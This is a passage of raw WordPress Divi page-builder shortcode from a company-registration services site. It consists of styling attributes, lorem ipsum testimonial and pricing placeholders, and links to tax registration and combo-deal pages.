parallax_method=\"on\"][et_pb_blurb title=\"Built In Analytics\" image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-27.png\" content_max_width=\"1100px\" image_max_width_phone=\"80px\" image_max_width_last_edited=\"on|phone\" _builder_version=\"3.17.6\" header_font=\"Poppins|600|||||||\" header_font_size_phone=\"16px\" header_font_size_last_edited=\"on|desktop\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_font_size=\"14px\" body_line_height=\"2em\" text_orientation=\"center\" animation_style=\"zoom\" animation_intensity_zoom=\"10%\" animation=\"off\" link_option_url=\"#\" locked=\"off\" child_filter_saturate__hover=\"150%\" child_filter_saturate__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\"][/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.17.6\"][et_pb_column type=\"4_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_button button_text=\"Get Started\" button_alignment=\"center\" _builder_version=\"3.17.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#ffffff\" button_bg_color=\"#091c4f\" button_border_color=\"rgba(0,0,0,0)\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Poppins|600|||||||\" button_use_icon=\"off\" box_shadow_style=\"preset1\" box_shadow_vertical=\"20px\" box_shadow_blur=\"71px\" box_shadow_spread=\"-14px\" box_shadow_color=\"#091c4f\" custom_padding=\"16px|32px|16px|32px|true|true\" button_letter_spacing_hover=\"2px\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Testimonials\" _builder_version=\"3.17.6\" custom_padding=\"0|30%|0|0px|false|false\" custom_padding_tablet=\"|0%||\"][et_pb_row use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" custom_padding=\"8vw||80px||false|false\" custom_padding_tablet=\"|0%||0%\" custom_padding_last_edited=\"off|desktop\" _builder_version=\"3.17.6\" background_color=\"rgba(239,103,40,0.96)\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d6545b\" background_color_gradient_end=\"#ff915e\" background_color_gradient_direction=\"148deg\" background_color_gradient_start_position=\"19%\" background_image=\"https://companyregistration.online/wp-content/uploads/2018/12/quote.png\" background_size=\"initial\" background_position=\"top_right\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"5%\"][et_pb_column type=\"4_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_slider _builder_version=\"3.17.6\" header_font=\"Poppins|500|||||||\" header_text_color=\"#ffffff\" header_font_size=\"32px\" header_font_size_tablet=\"22px\" header_font_size_phone=\"16px\" header_font_size_last_edited=\"on|tablet\" header_line_height=\"1.6em\" header_text_shadow_style=\"preset1\" header_text_shadow_color=\"rgba(0,0,0,0)\" body_font=\"||||||||\" body_text_color=\"rgba(255,255,255,0.53)\" body_line_height=\"2em\" body_text_shadow_style=\"preset1\" body_text_shadow_color=\"rgba(0,0,0,0)\" background_color=\"rgba(255,255,255,0)\" border_radii=\"on|10px|10px|10px|10px\" text_orientation=\"left\" custom_padding=\"0px||80px|\" animation_style=\"fade\" auto=\"on\" auto_speed=\"5000\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][et_pb_slide heading=\"%22Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Donec sollicitudin molestie malesuada. Vivamus suscipit tortor eget felis porttitor volutpat. \" _builder_version=\"3.17.6\"]<p>Monarch Inc.</p>[/et_pb_slide][et_pb_slide heading=\"%22Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Sed porttitor lectus nibh. Praesent sapien massa, convallis a pellentesque nec%22\" _builder_version=\"3.17.6\" alignment__hover=\"center\" alignment__hover_enabled=\"center\" custom_button__hover=\"off\" custom_button__hover_enabled=\"off\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_color__hover=\"#7EBEC5\" background_color__hover_enabled=\"#7EBEC5\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" header_text_shadow_style__hover=\"none\" header_text_shadow_style__hover_enabled=\"none\" header_text_shadow_color__hover=\"rgba(0,0,0,0.4)\" header_text_shadow_color__hover_enabled=\"rgba(0,0,0,0.4)\" body_text_shadow_style__hover=\"none\" body_text_shadow_style__hover_enabled=\"none\" body_text_shadow_color__hover=\"rgba(0,0,0,0.4)\" body_text_shadow_color__hover_enabled=\"rgba(0,0,0,0.4)\" button_bg_use_color_gradient__hover=\"off\" button_bg_use_color_gradient__hover_enabled=\"off\" button_bg_color_gradient_start__hover=\"#2b87da\" button_bg_color_gradient_start__hover_enabled=\"#2b87da\" button_bg_color_gradient_end__hover=\"#29c4a9\" button_bg_color_gradient_end__hover_enabled=\"#29c4a9\" button_bg_color_gradient_type__hover=\"linear\" button_bg_color_gradient_type__hover_enabled=\"linear\" button_bg_color_gradient_direction__hover=\"180deg\" button_bg_color_gradient_direction__hover_enabled=\"180deg\" button_bg_color_gradient_direction_radial__hover=\"center\" button_bg_color_gradient_direction_radial__hover_enabled=\"center\" button_bg_color_gradient_start_position__hover=\"0%\" button_bg_color_gradient_start_position__hover_enabled=\"0%\" button_bg_color_gradient_end_position__hover=\"100%\" button_bg_color_gradient_end_position__hover_enabled=\"100%\" button_bg_color_gradient_overlays_image__hover=\"off\" button_bg_color_gradient_overlays_image__hover_enabled=\"off\" button_bg_parallax__hover=\"off\" button_bg_parallax__hover_enabled=\"off\" button_bg_parallax_method__hover=\"on\" button_bg_parallax_method__hover_enabled=\"on\" button_bg_size__hover=\"cover\" button_bg_size__hover_enabled=\"cover\" button_bg_position__hover=\"center\" button_bg_position__hover_enabled=\"center\" button_bg_repeat__hover=\"no-repeat\" button_bg_repeat__hover_enabled=\"no-repeat\" button_bg_blend__hover=\"normal\" button_bg_blend__hover_enabled=\"normal\" button_bg_allow_player_pause__hover=\"off\" button_bg_allow_player_pause__hover_enabled=\"off\" button_bg_video_pause_outside_viewport__hover=\"on\" button_bg_video_pause_outside_viewport__hover_enabled=\"on\" button_text_shadow_style__hover=\"none\" button_text_shadow_style__hover_enabled=\"none\" button_text_shadow_color__hover=\"rgba(0,0,0,0.4)\" button_text_shadow_color__hover_enabled=\"rgba(0,0,0,0.4)\" box_shadow_style_button__hover=\"none\" box_shadow_style_button__hover_enabled=\"none\" box_shadow_color_button__hover=\"rgba(0,0,0,0.3)\" box_shadow_color_button__hover_enabled=\"rgba(0,0,0,0.3)\" background_layout__hover=\"dark\" background_layout__hover_enabled=\"dark\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" child_filter_hue_rotate__hover=\"0deg\" child_filter_hue_rotate__hover_enabled=\"0deg\" child_filter_saturate__hover=\"100%\" child_filter_saturate__hover_enabled=\"100%\" child_filter_brightness__hover=\"100%\" child_filter_brightness__hover_enabled=\"100%\" child_filter_contrast__hover=\"100%\" child_filter_contrast__hover_enabled=\"100%\" child_filter_invert__hover=\"0%\" child_filter_invert__hover_enabled=\"0%\" child_filter_sepia__hover=\"0%\" child_filter_sepia__hover_enabled=\"0%\" child_filter_opacity__hover=\"100%\" child_filter_opacity__hover_enabled=\"100%\" child_filter_blur__hover=\"0px\" child_filter_blur__hover_enabled=\"0px\" child_mix_blend_mode__hover=\"normal\" child_mix_blend_mode__hover_enabled=\"normal\" text_shadow_style__hover=\"none\" text_shadow_style__hover_enabled=\"none\" text_shadow_color__hover=\"rgba(0,0,0,0.4)\" text_shadow_color__hover_enabled=\"rgba(0,0,0,0.4)\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"]<p>Extra Co.</p>[/et_pb_slide][et_pb_slide heading=\"%22Nulla porttitor accumsan tincidunt. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Proin eget tortor risus. Vivamus suscipit tortor eget felis porttitor volutpat%22\" _builder_version=\"3.17.6\"]<p>Bloom</p>\n<p>&nbsp;</p>[/et_pb_slide][/et_pb_slider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonials\" _builder_version=\"3.17.6\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0|0px|54px|0px|false|false\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" custom_margin=\"-80px||\" _builder_version=\"3.17.6\"][et_pb_column type=\"2_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/12/portrait-square-04.jpg\" align=\"right\" _builder_version=\"3.17.6\" border_radii=\"on|100px|100px|100px|100px\" max_width=\"100px\" module_alignment=\"right\" animation_style=\"slide\" animation_direction=\"right\" locked=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"40px\" header_2_font_size_tablet=\"26px\" header_2_font_size_phone=\"20px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height=\"1.4em\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#ff885a\" header_3_font_size=\"13px\" header_3_letter_spacing=\"2px\" header_3_line_height=\"1.8em\" background_color=\"#ffffff\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset3\" box_shadow_vertical=\"10px\" box_shadow_blur=\"80px\" box_shadow_spread=\"-10px\" box_shadow_color=\"rgba(44,54,92,0.2)\" max_width=\"700px\" custom_padding=\"30px|30px|30px|30px|true|true\" animation_style=\"zoom\" animation_intensity_zoom=\"10%\" locked=\"off\" box_shadow_vertical__hover=\"50px\" box_shadow_vertical__hover_enabled=\"on\" box_shadow_blur__hover=\"180px\" box_shadow_blur__hover_enabled=\"on\"]<h3>\"I got my site up and running in less than a day!\"</h3>\n<p>Vivamus magna justo, lacinia eget consectetur sed, convallis at tellus. Sed porttitor lectus nibh. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus magna just</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.17.6\"][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/12/portrait-square-11.jpg\" align=\"right\" _builder_version=\"3.17.6\" border_radii=\"on|100px|100px|100px|100px\" border_color_all=\"#ffffff\" max_width=\"100px\" module_alignment=\"right\" animation_style=\"slide\" animation_direction=\"right\" locked=\"off\" box_shadow_vertical__hover=\"50px\" box_shadow_vertical__hover_enabled=\"on\" box_shadow_blur__hover=\"180px\" box_shadow_blur__hover_enabled=\"on\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"40px\" header_2_font_size_tablet=\"26px\" header_2_font_size_phone=\"20px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height=\"1.4em\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#ff885a\" header_3_font_size=\"13px\" header_3_letter_spacing=\"2px\" header_3_line_height=\"1.8em\" background_color=\"#ffffff\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset3\" box_shadow_vertical=\"10px\" box_shadow_blur=\"80px\" box_shadow_spread=\"-10px\" box_shadow_color=\"rgba(44,54,92,0.2)\" max_width=\"700px\" custom_padding=\"30px|30px|30px|30px|true|true\" animation_style=\"zoom\" animation_intensity_zoom=\"10%\" locked=\"off\" box_shadow_vertical__hover=\"50px\" box_shadow_vertical__hover_enabled=\"on\" box_shadow_blur__hover=\"180px\" box_shadow_blur__hover_enabled=\"on\"]<h3>\"I Tripled the size of my email lists!\"</h3>\n<p>Vivamus magna justo, lacinia eget consectetur sed, convallis at tellus. Sed porttitor lectus nibh. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus magna just</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.17.6\"][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.17.6\"][/et_pb_divider][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/12/portrait-square-06.jpg\" align=\"right\" _builder_version=\"3.17.6\" border_radii=\"on|100px|100px|100px|100px\" max_width=\"100px\" module_alignment=\"right\" animation_style=\"slide\" animation_direction=\"right\" locked=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"40px\" header_2_font_size_tablet=\"26px\" header_2_font_size_phone=\"20px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height=\"1.4em\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#ff885a\" header_3_font_size=\"13px\" header_3_letter_spacing=\"2px\" header_3_line_height=\"1.8em\" background_color=\"#ffffff\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset3\" box_shadow_vertical=\"10px\" box_shadow_blur=\"80px\" box_shadow_spread=\"-10px\" box_shadow_color=\"rgba(44,54,92,0.2)\" max_width=\"700px\" custom_padding=\"30px|30px|30px|30px|true|true\" animation_style=\"zoom\" animation_intensity_zoom=\"10%\" locked=\"off\" box_shadow_vertical__hover=\"50px\" box_shadow_vertical__hover_enabled=\"on\" box_shadow_blur__hover=\"180px\" box_shadow_blur__hover_enabled=\"on\"]<h3>\"This is my one-stop-shop for Web Design\"</h3>\n<p>Vivamus magna justo, lacinia eget consectetur sed, convallis at tellus. Sed porttitor lectus nibh. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus magna just</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"3.17.6\" background_image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-22.png\" background_size=\"contain\" background_position=\"bottom_center\" custom_margin=\"||\" custom_padding=\"10vw||43vw||false|false\" locked=\"off\"][et_pb_row _builder_version=\"3.17.6\"][et_pb_column type=\"3_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"40px\" header_2_font_size_tablet=\"26px\" header_2_font_size_phone=\"20px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height=\"1.4em\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#ff885a\" header_3_font_size=\"13px\" header_3_letter_spacing=\"2px\" header_3_line_height=\"1.8em\" max_width=\"700px\"]<h3>Fully Responsive</h3>\n<h2>Build For &amp; Tested on All Major Platforms &amp; Devices</h2>\n<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vivamus magna justo, lacinia eget consectetur sed, convallis at tellus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus magna justo, lacinia eget consectetur sed, convallis at tellus. Donec sollicitudin molestie malesuada. Lorem ipsum dolor sit amet</p>[/et_pb_text][et_pb_button button_text=\"Join Today\" _builder_version=\"3.17.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#ffffff\" button_bg_color=\"#091c4f\" button_border_color=\"rgba(0,0,0,0)\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Poppins|600|||||||\" button_use_icon=\"off\" box_shadow_style=\"preset1\" box_shadow_vertical=\"20px\" box_shadow_blur=\"71px\" box_shadow_spread=\"-14px\" box_shadow_color=\"#091c4f\" custom_padding=\"16px|32px|16px|32px|true|true\" button_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_letter_spacing__hover=\"2px\" button_letter_spacing__hover_enabled=\"on\" button_border_width__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.17.6\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row custom_padding=\"28px|0px|4px|0px\" _builder_version=\"3.0.53\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row make_fullwidth=\"on\" _builder_version=\"3.17.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Pricing Title\" _builder_version=\"3.17.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#150b72\" background_color_gradient_end=\"#5768d0\" custom_margin=\"||\" custom_padding=\"8vw||0||false|false\" locked=\"off\"][et_pb_row custom_padding=\"27px|0px|0|0px|false|false\" _builder_version=\"3.17.6\"][et_pb_column type=\"4_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"40px\" header_2_font_size_tablet=\"26px\" header_2_font_size_phone=\"20px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height=\"1.4em\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#ff885a\" header_3_font_size=\"13px\" header_3_letter_spacing=\"2px\" header_3_line_height=\"1.8em\" text_orientation=\"center\" background_layout=\"dark\" max_width=\"700px\" module_alignment=\"center\"]<h3>Pricing</h3>\n<h2>Choose A Plan That Works For You</h2>\n<p>Vivamus magna justo, lacinia eget consectetur sed, convallis at tellus. Sed porttitor lectus nibh. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Lorem ipsum dolor sit</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" custom_padding=\"0|0px|0|0px|false|false\" _builder_version=\"3.17.6\"][et_pb_column type=\"4_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/12/software-15.png\" force_fullwidth=\"on\" _builder_version=\"3.17.6\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"2%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"3.17.6\" background_color_gradient_direction=\"148deg\" background_image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-10.png\" background_position=\"top_center\" custom_padding=\"14vw||8vw||false|false\" locked=\"off\"][et_pb_row use_custom_width=\"on\" width_unit=\"off\" custom_padding=\"0px|0px|0|0px|false|false\" custom_padding_tablet=\"40px||40px||true\" custom_padding_last_edited=\"on|tablet\" _builder_version=\"3.17.6\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"2%\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" header_font=\"Poppins|600|||||||\" header_font_size=\"5vw\" header_font_size_tablet=\"38px\" header_font_size_phone=\"28px\" header_font_size_last_edited=\"on|phone\" header_line_height=\"1.5em\" header_text_shadow_style=\"preset3\" header_text_shadow_vertical_length=\"0.3em\" header_text_shadow_blur_strength=\"1.4em\" header_text_shadow_color=\"rgba(0,0,0,0.24)\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"4vw\" header_2_font_size_tablet=\"38px\" header_2_font_size_phone=\"28px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height=\"1.5em\" header_2_text_shadow_style=\"preset3\" header_2_text_shadow_vertical_length=\"0.3em\" header_2_text_shadow_blur_strength=\"1.4em\" header_2_text_shadow_color=\"rgba(0,0,0,0.24)\" text_orientation=\"center\" background_layout=\"dark\" max_width=\"70%\" max_width_last_edited=\"on|phone\" module_alignment=\"center\" custom_margin=\"||20px\" header_3_font_size__hover=\"22px\" header_3_font_size__hover_enabled=\"22px\" 